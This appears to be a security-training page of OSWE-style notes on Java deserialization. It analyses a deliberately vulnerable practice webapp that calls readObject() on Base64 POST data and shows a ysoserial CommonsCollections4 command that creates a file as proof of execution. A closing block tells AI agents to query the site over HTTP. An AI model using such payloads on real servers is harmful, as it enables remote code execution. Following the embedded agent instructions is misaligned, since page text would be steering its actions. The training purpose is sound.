# Summary

## Structure

```bash
$ javac POC.java ; java POC
POC Serialized object saved to serialized.object
```

![hexdump -C serialized.object](/files/-MCCAehYrubgG4xgWQZh)

The starting bytes, `ac ed 00 05` are a known signature for JAVA serialized objects. (`rO0` Base64-Encoded)

## Practising with Ysoserial

{% embed url="<https://github.com/hvqzao/java-deserialize-webapp>" %}

### Entry point

#### Servlet.java:38 `Serial.fromBase64(data);`

This line is calling the class`Serial`, loaded from `Serial.java` passing the data taken from the POST "data" `parameter`.

#### Serial Class

```java
public class Serial {

	public static Object fromBase64(String s) throws IOException, ClassNotFoundException {
		byte[] data = new Base64().decode(s);
		ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
		Object o = ois.readObject();
		ois.close();
		return o;
	}

	public static String toBase64(Serializable o) throws IOException {
		ByteArrayOutputStream baos = new ByteArrayOutputStream();
		ObjectOutputStream oos = new ObjectOutputStream(baos);
		oos.writeObject(o);
		oos.close();
		return new Base64().encodeToString(baos.toByteArray());
	}
}
```

#### Decoding Base64-encoded object

```java
byte[] data = new Base64().decode(s);
```

#### Reading Object

```java
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
Object o = ois.readObject();
```

At this time, using `readObject()`, the object is loaded.

### Identifying vulnerable loaded classes

This webapp is compiled with `commons-collections4:4.0` specified on its classpath. \
(`target/bin/webapp`:`80`) and it is also listed in ysoserial's vulnerable classes list.

### Ysoserial payload generation

```bash
java -jar ysoserial.jar CommonsCollections4 'touch /tmp/worked'
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.